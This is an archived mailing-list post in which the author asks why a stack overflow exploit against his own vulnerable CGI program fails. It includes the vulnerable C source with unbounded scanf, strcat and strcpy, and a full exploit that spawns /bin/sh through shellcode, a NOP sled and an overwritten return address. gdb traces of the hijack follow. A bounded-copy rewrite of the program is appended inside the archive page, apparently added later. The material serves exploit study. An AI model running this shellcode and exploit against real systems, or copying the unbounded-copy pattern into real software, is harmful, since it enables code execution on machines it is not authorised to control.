Vulnerability Development mailing list archives
Problem exploiting a CGI overflow
From: Víctor Henríquez <vhenriquez () grancanaria com>
Date: Tue, 23 Nov 2004 14:18:11 +0000
Hi, I'm new in this world. I discovered several buffer overflow problems in some of our home-made apps. I tried to exploit this but I have a rare problem.

--- Vuln Code (post2.c) ---
#include <stdio.h>
#include <string.h>

int main()
{
  void split(char *line);
  char line1[500],line2[500];

  strcpy(line2,"");
  while (!feof(stdin)) {
    scanf("%s",line1);        /* no field width: token can exceed line1 */
    strcat(line1," ");
    strcat(line2,line1);      /* unbounded append into line2 */
  }
  split(line2);
  printf("bye\n");
}
void split(char *line) {
  char txt[500];
  char *p;
  strcpy(txt,line);           /* unbounded copy into txt */
}
---

$ cc post2.c -o post.cgi -ggdb
$ perl -e 'print "A"x520' | ./post.cgi
Violación de segmento (core dumped)
$ gdb post.cgi core
gdb: Symbol `emacs_ctlx_keymap' has different size in shared object, consider re-linking
Core was generated by `./post.cgi'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()

Well... I'm trying to overflow the strcpy() in split().

--- exploit code ---
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DEFAULT_ADDRESS 0xbffff4d4
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 520
#define NOP 0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;
  FILE *out;

  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = DEFAULT_ADDRESS + offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  if ((out = fopen("buffer", "w")) == NULL) {
    perror("fopen");
    exit(-1);
  }
  fprintf(out, "%s", buff);
  fclose(out);
  return 1;
}
---

Now the problem...

$ echo "AAA" | ./post.cgi
bye
$ cc exploit.c -o exp
$ ./exp
Using address: 0xbffff4d4
$ cat buffer | ./post.cgi

It really executes other code, but not the shellcode. More GDB now...

$ gdb post.cgi
(gdb) r < buffer
Starting program: /home/victor/laboratory/gsi/post-dev/post.cgi < buffer

Breakpoint 1, split (line=0xbffff6e0 '\220' <repeats 200 times>...) at post2.c: 21
21        strcpy(txt,line);
(gdb) info f
Stack level 0, frame at 0xbffff6b8:
 eip = 0x804859d in split (post2.c:21); saved eip 0x804857f
 called by frame at 0xbffffac8
 source language c.
 Arglist at 0xbffff6b8, args: line=0xbffff6e0 '\220' <repeats 200 times>...
 Locals at 0xbffff6b8, Previous frame's sp is 0x0
 Saved registers:
  ebp at 0xbffff6b8, eip at 0xbffff6bc
(gdb) x 0xbffff6bc
0xbffff6bc:     0x0804857f
(gdb) n
22      }
(gdb) x 0xbffff6bc
0xbffff6bc:     0xbffff4d4      // Ret Changed!!

(gdb) x/100 0xbffff4d4
0xbffff4d4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4e4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4f4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff504:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff514:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff524:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff534:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff544:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff554:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff564:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff574:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff584:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff594:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff5a4:     0x90909090      0x90909090      0x90909090      0x1feb9090
0xbffff5b4:     0x0876895e      0x4688c031      0x20468907      0xf38920b0
0xbffff5c4:     0x8d084e8d      0x80cd2056      0xd889db31      0xe880cd40
0xbffff5d4:     0xffffffdc      0x6e69622f      0xbf68732f      0xbffff4d4
0xbffff5e4:     0xbffff4d4      0xbffff4d4      0xbffff4d4      0xbffff4d4
0xbffff5f4:     0xbffff4d4      0xbffff4d4      0xbffff4d4      0xbffff4d4
// Shellcode is in position...
(gdb) n

Program exited normally.

What's happening!? I discovered that the shellcode changes during its execution. Yeah, some bytes of the shellcode change while it is running. Why?? How can I avoid this?

Thanks in advance

--
Víctor Henríquez

-------------------------------------------------
This email has been sent via http://www.grancanaria.com
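The three unbounded calls in post2.c (scanf("%s") with no field width, strcat into line2, strcpy into txt) are what let a 520-byte input overwrite the saved return address. As an added defensive counterpart, which is not code from the post or its author, here is the same input loop and split() rewritten with bounded operations: tokens are split on whitespace as scanf("%s") does, each append and copy is checked against the destination size, and an input that does not fit is reported rather than written past the buffer. The names collect_tokens, split_bounded and process_input, the 4096-byte stdin read in main and the status codes are this example's own choices, and the 500-byte buffers match post2.c.

```c
/* Bounded rewrite of the post2.c input loop and split(). Added example,
   not the original author's code; function names are this example's own. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define LINE_MAX_LEN 500   /* same buffer size as post2.c */

/* Append src to dst (capacity dstsz) only if it fits together with the
   terminator; otherwise leave dst unchanged and return -1. */
static int append_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t used = strlen(dst);
    size_t need = strlen(src);
    if (used + need + 1 > dstsz)
        return -1;
    memcpy(dst + used, src, need + 1);
    return 0;
}

/* Replacement for the scanf("%s")/strcat loop: split input on whitespace,
   append each token plus one space to out, never writing past out[outsz-1].
   Returns the number of tokens kept; *truncated is set if any was dropped. */
int collect_tokens(const char *input, char *out, size_t outsz, int *truncated)
{
    int kept = 0;
    const char *p = input;
    *truncated = 0;
    out[0] = '\0';
    while (*p) {
        while (*p && isspace((unsigned char)*p))   /* skip separators */
            p++;
        if (!*p)
            break;
        const char *start = p;
        while (*p && !isspace((unsigned char)*p))  /* scan one token */
            p++;
        size_t len = (size_t)(p - start);
        char tok[LINE_MAX_LEN];                    /* plays the role of line1 */
        if (len + 2 > sizeof tok) {                /* token + ' ' + NUL must fit */
            *truncated = 1;
            continue;
        }
        memcpy(tok, start, len);
        tok[len] = ' ';
        tok[len + 1] = '\0';
        if (append_bounded(out, outsz, tok) != 0) {
            *truncated = 1;
            continue;
        }
        kept++;
    }
    return kept;
}

/* Replacement for split(): copy only if line fits txt, else return -1. */
int split_bounded(const char *line, char *txt, size_t txtsz)
{
    size_t len = strlen(line);
    if (len + 1 > txtsz)
        return -1;
    memcpy(txt, line, len + 1);
    return 0;
}

/* Whole pipeline on an in-memory input. Returns 0 if everything fit,
   1 if some tokens were dropped, -1 if split_bounded() refused the line. */
int process_input(const char *input, int *kept)
{
    char line2[LINE_MAX_LEN];
    char txt[LINE_MAX_LEN];
    int truncated;
    *kept = collect_tokens(input, line2, sizeof line2, &truncated);
    if (split_bounded(line2, txt, sizeof txt) != 0)
        return -1;
    return truncated ? 1 : 0;
}

int main(void)
{
    static char raw[4096];                  /* bounded read of stdin */
    size_t n = fread(raw, 1, sizeof raw - 1, stdin);
    int kept;
    raw[n] = '\0';
    int rc = process_input(raw, &kept);
    printf("kept %d token(s), status %d\nbye\n", kept, rc);
    return rc < 0;
}
```

With this version the `perl -e 'print "A"x520'` input from the post yields status 1 and zero kept tokens instead of a segmentation fault, because a 520-byte token cannot fit the 500-byte per-token buffer and is dropped before any copy happens.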
Current thread:
- Problem exploiting a CGI overflow Víctor Henríquez (Nov 23)
- Re: Problem exploiting a CGI overflow sin (Nov 23)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 24)
- Re: Problem exploiting a CGI overflow Vlad902 (Nov 27)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 24)
- Re: Problem exploiting a CGI overflow Víctor Henríquez (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 29)
- <Possible follow-ups>
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 24)
- Re: Problem exploiting a CGI overflow sin (Nov 28)
- Re: Problem exploiting a CGI overflow Marco Ivaldi (Nov 28)
- Re: Problem exploiting a CGI overflow sin (Nov 23)